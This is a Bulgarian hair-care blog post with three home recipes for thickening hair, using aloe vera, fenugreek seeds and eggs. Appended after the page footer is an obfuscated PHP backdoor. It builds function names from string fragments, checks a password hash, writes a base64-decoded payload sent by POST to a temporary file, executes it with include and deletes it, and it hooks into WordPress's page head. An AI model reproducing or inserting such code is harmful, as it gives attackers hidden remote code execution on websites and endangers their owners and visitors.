3 лесни рецепти за сгъстяване на косата | Косопад

3 лесни рецепти за сгъстяване на косата

kosa-1

Ако имаме тънка коса и търсим начини да я сгъстим, можем да изпробваме някой от разнообразните варианти, които ни предлага природата.

Ето 3 от най- ефективните природни средства за сгъстяване на косата:

Алое Вера
Сред най- ефективните решения при проблеми с косата.

Как да го използваме? Необходими са ни 2-3 листа от алое вера. Използваме вътрешната им част. Намачкваме го добре, докато стане на сок. Нанасяме върху скалпа. Масажираме около 2 минути и после изчакваме 20 минути. Отстранява се с хладка вода.
Друг начин да използваме алое вера за сгъстяване на косата, е като го комбинираме с 1 яйце. Нанасяме и изчакваме 20 минути преди да изплакнем.
Използва се 2 пъти седмично.

kosa

Сминдух
Семената от сминдух правят косата много по- гъста. Стимулират растежа на косъма.

Как да се използва? Накисваме 2 лъжици от семената във вода за цяла нощ. Разбиваме ги, докато станат на паста. После добавяме 1 лъжица вода, за да стане по- лесно за масаж. Сместа се нанася върху скалпа и се оставя 30 минути. После се отстранява със студена вода и се мие, както обикновено.
Прави се всеки ден, докато се постигне желания резултат.

Яйца
Помагат при най- разнообразни проблеми, свързани с косата. Причината е, че са много богати на протеини.

Как да ги използваме? Взимаме две яйца и ги разбиваме. Косата се намокря предварително. Разбитите яйца се нанасят от корема към върховете. Оставяме да престоят 20 минути, като завиваме косата с шапка за баня. После сместа се отстранява с масажиращи движения и вода. Мием косата с шампоан и балсам.
Прави се 2 пъти седмично, докато се постигне желания ефект.

Ако искаме да хидратираме косата и да й придадем повече блясък, можем да използваме следната смес: 1 яйце, 1 лъжица мед, 2 лъжици рициново масло. Можем да удвоим или утроим броя на съставките, в зависимост от дължината на косата. Нанасяме сместа първо в корените, а после и по целия косъм. Слагаме шапка за баня и оставяме маската да подейства 2-4 часа. Плакнем и измиваме косата.
Сместа се използва 1-2 пъти седмично. След 2 месеца ще има видими резултати от употребата на маската.

06. август 2017 16:29:52 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}